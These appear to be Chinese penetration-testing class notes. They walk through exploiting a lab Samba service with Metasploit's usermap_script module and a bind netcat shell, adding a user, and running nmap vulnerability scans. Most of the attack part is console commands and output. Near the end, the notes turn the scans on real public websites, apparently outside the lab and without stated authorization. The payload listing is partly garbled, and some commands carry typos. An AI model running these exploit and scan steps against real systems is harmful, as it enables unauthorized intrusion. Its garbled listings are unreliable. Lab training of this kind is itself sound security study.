渗透测试培训 3月13日
第一天:主要实验总结
首先利用struts2
漏洞,可以直接执行任意命令,取得主机控制权。
实验环境:
KALI linux 作为攻击工具; owasp 作为靶机
2003 metaspoitable 实现能够成功访问
使用metaspliot完成对于靶机samba 服务的攻击,获取shell 权限 search samba 查找模块
Use multi/samba/usemap_script 选择渗透攻击模块 Show payloads 查看与该渗透模块相兼容的攻击载荷
Set payload cmd/unix/bind_netcat选择netcat工具在渗透攻击成功后执行shell Show options 查看需要设置的参数
Set RHOST 10.10.10.254 设置主机攻击主机 Exploit启动攻击
1、首先安装vm虚拟机程序,开启kali,owasp和metaspoitalbe等工具和搭建环境,使得网络可达,网络配置上选择nat模式,地址范围为10.10.10.0/24 2、开启kali虚机,进入root模式,
首先进入msfconsle,修改初始密码为123456 msf〉> passwd [*] exec: passwd
输入新的 UNIX 密码: 重新输入新的 UNIX 密码: passwd:已成功更新密码
然后寻找samba模块 msf > search samba
Matching Modules ================
Name Disclosure Date Rank Description
---- --------------- ---- -----------
auxiliary/admin/smb/samba_symlink_traversal normal Samba Symlink Directory Traversal
auxiliary/dos/samba/lsa_addprivs_heap normal Samba lsa_io_privilege_set Heap Overflow
auxiliary/dos/samba/lsa_transnames_heap normal Samba lsa_io_trans_names Heap Overflow
auxiliary/dos/samba/read_nttrans_ea_list normal Samba read_nttrans_ea_list Integer Overflow
exploit/freebsd/samba/trans2open 2003-04-07 great Samba trans2open Overflow (*BSD x86)
exploit/linux/samba/chain_reply 2010-06-16 good Samba chain_reply Memory Corruption (Linux x86)
exploit/linux/samba/lsa_transnames_heap 2007-05-14 good Samba lsa_io_trans_names Heap Overflow
exploit/linux/samba/setinfopolicy_heap 2012-04-10 normal Samba SetInformationPolicy AuditEventsInfo Heap Overflow
exploit/linux/samba/trans2open 2003-04-07 great Samba trans2open Overflow (Linux x86)
exploit/multi/samba/nttrans 2003-04-07 average Samba 2.2.2 - 2.2.6 nttrans Buffer Overflow
exploit/multi/samba/usermap_script 2007-05-14 excellent Samba \
exploit/osx/samba/lsa_transnames_heap 2007-05-14 average Samba lsa_io_trans_names Heap Overflow
exploit/osx/samba/trans2open 2003-04-07 great Samba trans2open Overflow (Mac OS X PPC)
exploit/solaris/samba/lsa_transnames_heap 2007-05-14 average Samba lsa_io_trans_names Heap Overflow
exploit/solaris/samba/trans2open 2003-04-07 great Samba trans2open Overflow (Solaris SPARC)
exploit/unix/misc/distcc_exec 2002-02-01 excellent DistCC Daemon Command Execution
exploit/unix/webapp/citrix_access_gateway_exec 2010-12-21 excellent Citrix Access Gateway Command Execution
exploit/windows/http/sambar6_search_results 2003-06-21 normal Sambar 6 Search Results Buffer Overflow
exploit/windows/license/calicclnt_getconfig 2005-03-02 average Computer Associates License Client GETCONFIG Overflow
post/linux/gather/enum_configs normal Linux Gather Configurations
msf > use multi/samba/usermap_script 选择渗透攻击模块
msf exploit(usermap_script) > show payloads 查看与该渗透模块相兼容的攻击载荷 Compatible Payloads ===================
Name Disclosure Date Rank Description ---- --------------- ---- -----------
cmd/unix/bind_awk normal Unix Command Shell, Bind TCP (via AWK)
cmd/unix/bind_inetd normal Unix Command Shell, Bind TCP (inetd)
cmd/unix/bind_lua normal Unix Command Shell, Bind TCP (via Lua)
cmd/unix/bind_netcat normal Unix Command Shell, Bind TCP (via netcat)
cmd/unix/bind_netcat_gaping normal Unix Command Shell, Bind TCP (via netcat -e)
cmd/unix/bind_netcat_gaping_ipv6 Bind TCP (via netcat -e) IPv6
cmd/unix/bind_perl Bind TCP (via Perl)
cmd/unix/bind_perl_ipv6 Bind TCP (via perl) IPv6
cmd/unix/bind_ruby Shell, Bind TCP (via Ruby)
cmd/unix/bind_ruby_ipv6 Bind TCP (via Ruby) IPv6
cmd/unix/bind_zsh Shell, Bind TCP (via Zsh)
cmd/unix/generic Generic Command Execution
cmd/unix/reverse Double Reverse TCP (telnet)
cmd/unix/reverse_awk Shell, Reverse TCP (via AWK)
cmd/unix/reverse_lua Reverse TCP (via Lua)
cmd/unix/reverse_netcat Reverse TCP (via netcat)
cmd/unix/reverse_netcat_gaping Reverse TCP (via netcat -e)
cmd/unix/reverse_openssl Double Reverse TCP SSL (openssl)
cmd/unix/reverse_perl Reverse TCP (via Perl)
cmd/unix/reverse_perl_ssl Reverse TCP SSL (via perl)
cmd/unix/reverse_php_ssl Reverse TCP SSL (via php)
cmd/unix/reverse_python Reverse TCP (via Python)
normal Unix Command Shell, normal Unix Command Shell, normal Unix Command Shell, normal Unix Command normal Unix Command Shell, normal Unix Command normal Unix Command, normal Unix Command Shell, normal Unix Command normal Unix Command Shell, normal Unix Command Shell, normal Unix Command Shell, normal Unix Command Shell, normal Unix Command Shell, normal Unix Command Shell, normal Unix Command Shell, normal Unix Command Shell, cmd/unix/reverse_python_ssl normal Unix Command Shell, Reverse TCP SSL (via python)
cmd/unix/reverse_ruby normal Unix Command Shell, Reverse TCP (via Ruby)
cmd/unix/reverse_ruby_ssl normal Unix Command Shell, Reverse TCP SSL (via Ruby)
cmd/unix/reverse_ssl_double_telnet normal Unix Command Shell, Double Reverse TCP SSL (telnet)
cmd/unix/reverse_zsh normal Unix Command Shell, Reverse TCP (via Zsh)
msf exploit(usermap_script) > set payload cmd/unix/bind_netcat 选择netcat工具在渗透攻击成功后执行shell
payload => cmd/unix/bind_netcat
msf exploit(usermap_script) > show options 查看需要设置的参数
msf exploit(usermap_script) > set RHOST 10.10.10.254设置主机攻击主机 RHOST => 10.10.10.254
msf exploit(usermap_script) > exploit启动攻击
[*] Started bind handler
[*] Command shell session 1 opened (10.10.10.128:56558 -> 10.10.10.254:4444) at 2015-03-13 16:06:40 +0800
已经取得10.10.10.254机子的控制权,可以增加用户 useradd test 用户增加成功
&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&& 存活探测 -PU -sn UDP ping不列服务,-Pn不适用ping
nmap -sS -Pn xx.xx.xx.xx tcp syn 扫描 不发送icmp namp -sV -Pn xx.xx.xx.xx 列出服务详细信息
namp -PO -script=smb-check-vulns xx.xx.xx.xx 查找ms-08067漏洞
&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&
nmap 网站扫描
msf > nmap
msf > nmap -sV -Pn 10.10.10.254 [*] exec: nmap -sV -Pn 10.10.10.254
Starting Nmap 6.46 ( http://nmap.org ) at 2015-03-13 16:38 CST Nmap scan report for 10.10.10.254 Host is up (0.00020s latency).
All 1000 scanned ports on 10.10.10.254 are filtered
MAC Address: 00:50:56:E7:1B:31 (VMware)
Service detection performed. Please report any incorrect results at http://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 22.84 seconds
msf > nmap -PO -script=smb-check-vulns 10.10.10.254 [*] exec: nmap -PO -script=smb-check-vulns 10.10.10.254
Starting Nmap 6.46 ( http://nmap.org ) at 2015-03-13 16:47 CST Nmap scan report for 10.10.10.254 Host is up (0.00021s latency).
All 1000 scanned ports on 10.10.10.254 are filtered MAC Address: 00:50:56:E7:1B:31 (VMware)
map done: 1 IP address (1 host up) scanned in 23.06 seconds
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
msf > nmap -O www.ctsi.com.cn [*] exec: nmap -O www.ctsi.com.cn
Starting Nmap 6.46 ( http://nmap.org ) at 2015-03-13 17:16 CST Nmap scan report for www.ctsi.com.cn (211.100.35.132) Host is up (0.0054s latency). Not shown: 999 filtered ports PORT STATE SERVICE 80/tcp open http
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Brother MFC-7820N printer (94%), Digi Connect ME serial-to-Ethernet bridge (94%), Netgear SC101 Storage Central NAS device (91%), ShoreTel ShoreGear-T1 VoIP switch (91%), Aastra 480i IP Phone or Sun Remote System Control (RSC) (91%), Aastra 6731i VoIP phone or Apple AirPort Express WAP (91%), Cisco Wireless IP Phone 7920-ETSI (91%), GoPro HERO3 camera (91%), Konica Minolta bizhub 250 printer (91%), Linux 2.4.26 (Slackware 10.0.0) (86%)
No exact OS matches for host (test conditions non-ideal).
OS detection performed. Please report any incorrect results at http://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 57.88 seconds
msf > use auxiliary/scanner/http/dir_scanner msf auxiliary(dir_scanner) > set THREADS 50 THREADS => 50
msf auxiliary(dir_scanner) > set RHOSTS www.http://www.35331.cn/